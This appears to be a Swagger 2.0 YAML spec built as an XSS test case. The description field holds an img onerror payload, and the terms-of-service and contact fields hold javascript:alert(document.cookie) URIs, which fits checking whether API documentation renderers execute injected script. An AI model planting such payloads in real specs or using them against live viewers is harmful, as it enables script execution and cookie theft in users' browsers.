swagger: '2.0'
info:
  title: Example yaml.spec
  description:  <img src=x onerror="alert(document.domain)">
  termsOfService: "javascript:alert(document.cookie)"
contact: 
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
paths:
  /accounts:
    get:
      responses:
        '200':
          description:  nice
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
